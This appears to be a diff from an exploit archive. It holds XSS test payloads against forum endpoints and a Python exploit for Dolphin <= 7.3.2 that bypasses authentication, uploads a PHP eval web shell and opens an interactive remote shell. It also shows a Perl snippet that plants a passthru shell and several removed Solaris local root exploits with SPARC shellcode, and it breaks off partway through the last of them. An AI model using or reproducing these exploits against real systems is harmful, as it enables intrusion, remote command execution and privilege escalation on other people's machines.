/login.php?action=out&amp;id=3&amp;csrf_token=4b072f27396cec5d79&quot;/&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
GET
/misc.php?action=markforumread&amp;fid=1&amp;csrf_token=c173cabad786&quot;/&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
POST /delete.php?id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_confirm=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;delete=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/
script&gt;
POST /delete.php?id=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_confirm=>"&#039;><script>alert(oink)</script>&delete=>"&#039;><script>alert(oink)</
script>
POST /edit.php?id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_message=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;submit=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/
script&gt;
POST /edit.php?id=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_message=>"&#039;><script>alert(oink)</script>&submit=>"&#039;><script>alert(oink)</
script>
POST /login.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_email=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;request_pass=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oin
k)&lt;/script&gt;
POST /login.php?action=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_email=>"&#039;><script>alert(oink)</script>&request_pass=>"&#039;><script>alert(oin
k)</script>
POST /misc.php?email=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;redirect_url=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_subject=&gt;&quot;&#039;&gt;&lt;script&gt;alert(o
ink)&lt;/script&gt;&amp;req_message=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;submit=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST /misc.php?email=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&redirect_url=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_subject=>"&#039;><script>alert(o
ink)</script>&req_message=>"&#039;><script>alert(oink)</script>&submit=>"&#039;><script>alert(oink)</script>
POST
/profile.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_old_password=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_new_password1=&gt;&quot;&#039;&gt;&lt;scri
pt&gt;alert(oink)&lt;/script&gt;&amp;req_new_password2=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;update=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
/profile.php?action=>"&#039;><script>alert(oink)</script>&id=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_old_password=>"&#039;><script>alert(oink)</script>&req_new_password1=>"&#039;><scri
pt>alert(oink)</script>&req_new_password2=>"&#039;><script>alert(oink)</script>&update=>"&#039;><script>alert(oink)</script>
POST /register.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_username=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_password1=&gt;&quot;&#039;&gt;&lt;script&gt;alert
(oink)&lt;/script&gt;&amp;req_password2=&gt;&quot;&#039;&gt;&lt;script&gt;alert(369448)&lt;/script&gt;&amp;req_email1=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;timezone=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;register=&gt;&quot;&#039;&gt;
&lt;script&gt;alert(oink)&lt;/script&gt;
POST /register.php?action=>"&#039;><script>alert(oink)</script>
form_sent=>"&#039;><script>alert(oink)</script>&csrf_token=>"&#039;><script>alert(oink)</script>&req_username=>"&#039;><script>alert(oink)</script>&req_password1=>"&#039;><script>alert
(oink)</script>&req_password2=>"&#039;><script>alert(369448)</script>&req_email1=>"&#039;><script>alert(oink)</script>&timezone=>"&#039;><script>alert(oink)</script>&register=>"&#039;>
<script>alert(oink)</script>

91
platforms/php/webapps/40756.py Executable file
View file

@ -0,0 +1,91 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Software : Dolphin <= 7.3.2 Auth bypass / RCE exploit
Vendor : www.boonex.com
Author : Ahmed sultan (0x4148)
Home : 0x4148.com | https://www.linkedin.com/in/0x4148
Email : 0x4148@gmail.com
Auth bypass trick credit go to Saadat Ullah
'''
import os
import sys
import urllib
import urllib2
import ssl
import base64
print "[+] Dolphin <= 7.3.2 Auth bypass / RCE exploit"
print "[+] Author : Ahmed sultan (0x4148)"
print "[+] Home : 0x4148.com\n"
if len(sys.argv)<2:
print "\nUsage : python "+sys.argv[0]+" http://HOST/path/\n"
sys.exit();
hosturl=sys.argv[1]
fields = {'csrf_token': 'Aint give a shit about csrf stuff ;)', 'submit_upload': '0x4148'}
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def generate_http_request(fields):
lmt = '---------------------------'
crlf = '\r\n'
x4148mltprt = []
x4148mltprt.append('--' + lmt)
if fields:
for (key, value) in fields.items():
x4148mltprt.append('Content-Disposition: form-data; name="%s"' % key)
x4148mltprt.append('')
x4148mltprt.append(value)
x4148mltprt.append('--' + lmt)
x4148mltprt.append('Content-Disposition: form-data; name="module"; filename="0x4148.zip"')
x4148mltprt.append('Content-Type: application/zip')
x4148mltprt.append('')
x4148mltprt.append("PK\x03\x04\x0a\x00\x00\x00\x00\x00RanIj\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x000x4148fo.php"
"<?php\x0d\x0aeval(base64_decode($_POST[\'0x4148\']));\x0d\x0a?>PK\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00RanIj"
"\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x00\x00\x00\x00\x00\x00\x000x4148fo.php"
"PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00:\x00\x00\x00[\x00\x00\x00\x00\x00")
x4148mltprt.append('--' + lmt + '--')
x4148mltprt.append('')
body = crlf.join(x4148mltprt)
content_type = 'multipart/form-data; boundary=%s' % (lmt)
return content_type, body
content_type, body = generate_http_request(fields)
print " + Sending payload to "+hosturl.split("//")[1].split("/")[0]
req = urllib2.Request(hosturl+"/administration/modules.php",body)
req.add_header('User-agent', 'Mozilla 15')
req.add_header("Cookie", "memberID=1; memberPassword[]=0x4148;")
req.add_header('Referer', hosturl+"/administration/modules.php")
req.add_header('Content-Type', content_type)
req.add_header('Content-Length', str(len(body)))
req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8')
try:
urllib2.urlopen(req,context=gcontext).read()
except urllib2.HTTPError, e:
err=e.fp.read()
print err
sys.exit()
print " * Checking if payload was send"
data = urllib.urlencode({'0x4148':'echo "0x4148foooo";'.encode('base64')})
req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data)
if urllib2.urlopen(req).read().find("0x4148foooo")==-1:
print " - Exploitation failed"
print req
sys.exit()
print " + php prompt up and running\n + type 'shell' to get shell access"
while True:
request=str(raw_input("\nphp>> "))
if request=="exit":
sys.exit()
if request=="shell" or request=="cmd":
print "\n + Switched to Shell mode\n + Type 'return' to return to php prompt mode"
while True:
cmd=str(raw_input("\n0x4148@"+hosturl.split("//")[1].split("/")[0]+"# "))
if cmd=="return":
break
if cmd=="exit":
sys.exit()
kkk="passthru('"+cmd+"');"
data = urllib.urlencode({'0x4148':kkk.encode('base64')})
req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data)
print urllib2.urlopen(req).read()
data = urllib.urlencode({'0x4148':request.encode('base64')})
req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data)
print urllib2.urlopen(req).read()

8
platforms/php/webapps/4963.pl
View file

@ -140,10 +140,10 @@ sub create_shell()
$_text_1->insert('end', "[~] Edit Template\n");
$new_t = '<? if(isset($_POST[\'RSTGHC\'])) { echo "RST_GHC_TEMPLATE"; passthru($_POST[\'RSTGHC\']); echo "RST_GHC_TEMPLATE"; } ?>';
$t =~ s/&lt;/</g;
$t =~ s/&gt;/>/g;
$t =~ s/&quot;/"/g;
$t =~ s/&amp;/&/g;
$t =~ s/</</g;
$t =~ s/>/>/g;
$t =~ s/"/"/g;
$t =~ s/&/&/g;
$t =~ s/&nbsp;/ /g;
$new_t .= $t;

33
platforms/solaris/local/40727.sh
View file

@ -1,33 +0,0 @@
#!/bin/sh
#
# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $
#
# raptor_ucbps - information leak with Solaris /usr/ucb/ps
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow
# unprivileged local users the ability to see environment variables and their
# values for processes which belong to other users (Sun Alert ID: 102215).
#
# Absolutely nothing fancy, but it may turn out to be useful;)
#
# Usage:
# $ chmod +x raptor_ucbps
# $ ./raptor_ucbps
# [...]
#
# Vulnerable platforms (SPARC):
# Solaris 8 without patch 109023-05 [tested]
# Solaris 9 without patch 120240-01 [tested]
#
# Vulnerable platforms (x86):
# Solaris 8 without patch 109024-05 [untested]
# Solaris 9 without patch 120239-01 [untested]
#
echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
/usr/ucb/ps -auxgeww

189
platforms/solaris/local/40728.c
View file

@ -1,189 +0,0 @@
/*
* $Id: raptor_libdthelp.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_libdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Buffer overflow in CDE libDtHelp library allows local users to execute
* arbitrary code via a modified DTHELPUSERSEARCHPATH environment variable
* and the Help feature (CAN-2003-0834).
*
* Possible attack vectors are: DTHELPSEARCHPATH (as used in this exploit),
* DTHELPUSERSEARCHPATH, LOGNAME (those two require a slightly different
* exploitation technique, due to different code paths).
*
* Usage:
* $ gcc raptor_libdthelp.c -o raptor_libdthelp -Wall
* [on your xserver: disable the access control]
* $ ./raptor_libdthelp 192.168.1.1:0
* [on your xserver: enter the dtprintinfo help]
* # id
* uid=0(root) gid=1(other)
* #
*
* Vulnerable platforms:
* Solaris 7 without patch 107178-03 [tested]
* Solaris 8 without patch 108949-08 [tested]
* Solaris 9 without patch 116308-01 [tested]
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_libdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9"
#define INFO2 "Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // default setuid target
#define BUFSIZE 1200 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env vars
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
/* double setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE];
char platform[256], release[256], display[256];
int i, offset, ret, var1_addr, var2_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "DTHELPSEARCHPATH=", 17);
/* prepare the evil env vars */
memset(var1, 'B', sizeof(var1));
var1[sizeof(var1) - 1] = 0x0;
memset(var2, 'C', sizeof(var2));
var2[sizeof(var2) - 1] = 0x0;
/* fill the envp, keeping padding */
var1_addr = add_env(sc);
var2_addr = add_env(var1);
add_env(var2);
add_env(display);
add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin");
add_env("HOME=/tmp");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ret = sb - offset + arg_len;
var1_addr += ret;
var2_addr += ret;
/* fill the evil buffer */
for (i = 17; i < BUFSIZE - 8; i += 4)
set_val(buf, i, var1_addr - 5000);
/* fill the evil env vars */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var1, i, var2_addr - 500);
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var2, i, ret);
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr);
fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr);
fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}

329
platforms/solaris/local/40729.c
View file

@ -1,329 +0,0 @@
/*
* $Id: raptor_libdthelp2.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_libdthelp2.c - libDtHelp.so local, Solaris/SPARC 7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Buffer overflow in CDE libDtHelp library allows local users to execute
* arbitrary code via a modified DTHELPUSERSEARCHPATH environment variable
* and the Help feature (CAN-2003-0834).
*
* "Stay with non exec, it keeps you honest" -- Dave Aitel (0dd)
*
* Possible attack vectors are: DTHELPSEARCHPATH (as used in this exploit),
* DTHELPUSERSEARCHPATH, LOGNAME (those two require a slightly different
* exploitation technique, due to different code paths).
*
* This is the ret-into-ld.so version of raptor_libdthelp.c, able to bypass
* the non-executable stack protection (noexec_user_stack=1 in /etc/system).
*
* NOTE. If experiencing troubles with null-bytes inside the ld.so.1 memory
* space, use sprintf() instead of strcpy() (tested on some Solaris 7 boxes).
*
* Usage:
* $ gcc raptor_libdthelp2.c -o raptor_libdthelp2 -ldl -Wall
* [on your xserver: disable the access control]
* $ ./raptor_libdthelp2 192.168.1.1:0
* [on your xserver: enter the dtprintinfo help]
* # id
* uid=0(root) gid=1(other)
* #
*
* Vulnerable platforms:
* Solaris 7 without patch 107178-03 [tested]
* Solaris 8 without patch 108949-08 [tested]
* Solaris 9 without patch 116308-01 [tested]
*/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_libdthelp2.c - libDtHelp.so local, Solaris/SPARC 7/8/9"
#define INFO2 "Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // default setuid target
#define BUFSIZE 1200 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env vars
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
/* double setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE], ff[FFSIZE];
char platform[256], release[256], display[256];
int i, offset, ff_addr, sc_addr, var1_addr, var2_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "DTHELPSEARCHPATH=", 17);
/* prepare the evil env vars */
memset(var1, 'B', sizeof(var1));
var1[sizeof(var1) - 1] = 0x0;
memset(var2, 'C', sizeof(var2));
var2[sizeof(var2) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
var1_addr = add_env(sc);
var2_addr = add_env(var1);
add_env(var2);
add_env(display);
add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin");
add_env("HOME=/tmp");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ff_addr = sb - offset + arg_len;
sc_addr += ff_addr;
var1_addr += ff_addr;
var2_addr += ff_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* fill the evil buffer */
for (i = 17; i < BUFSIZE - 76; i += 4)
set_val(buf, i, var1_addr - 5000);
/* apparently, we don't need to bruteforce */
set_val(buf, i, ff_addr);
set_val(buf, i += 4, ret - 4); /* strcpy(), after the save */
/* fill the evil env vars */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var1, i, var2_addr - 500);
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var2, i, ret - 8); /* ret, before strcpy() */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr);
fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
check_zero(addr - 8, sym); /* addr - 8 is the ret before strcpy() */
return(addr);
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return(addr_old);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}

570
platforms/solaris/local/40730.c
View file

@ -1,570 +0,0 @@
/*
* $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users
* to gain privileges via unknown attack vectors (CAN-2004-0360).
*
* "Those of you lucky enough to have your lives, take them with you. However,
* leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0
*
* This exploit uses the ret-into-ld.so technique, to effectively bypass the
* non-executable stack protection (noexec_user_stack=1 in /etc/system). The
* exploitation wasn't so straight-forward: sending parameters to passwd(1)
* is somewhat tricky, standard ret-into-stack doesn't seem to work properly
* for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory
* references before reaching ret. Many thanks to Inode <inode@deadlocks.info>.
*
* Usage:
* $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall
* $ ./raptor_passwd <current password>
* [...]
* # id
* uid=0(root) gid=1(other) egid=3(sys)
* #
*
* Vulnerable platforms:
* Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested]
* Solaris 9 without 113476-11 [tested]
*/
#include <ctype.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/bin/passwd" // target vulnerable program
#define BUFSIZE 256 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env var
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
#define CMD "id;uname -a;uptime;\n" // execute upon exploitation
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
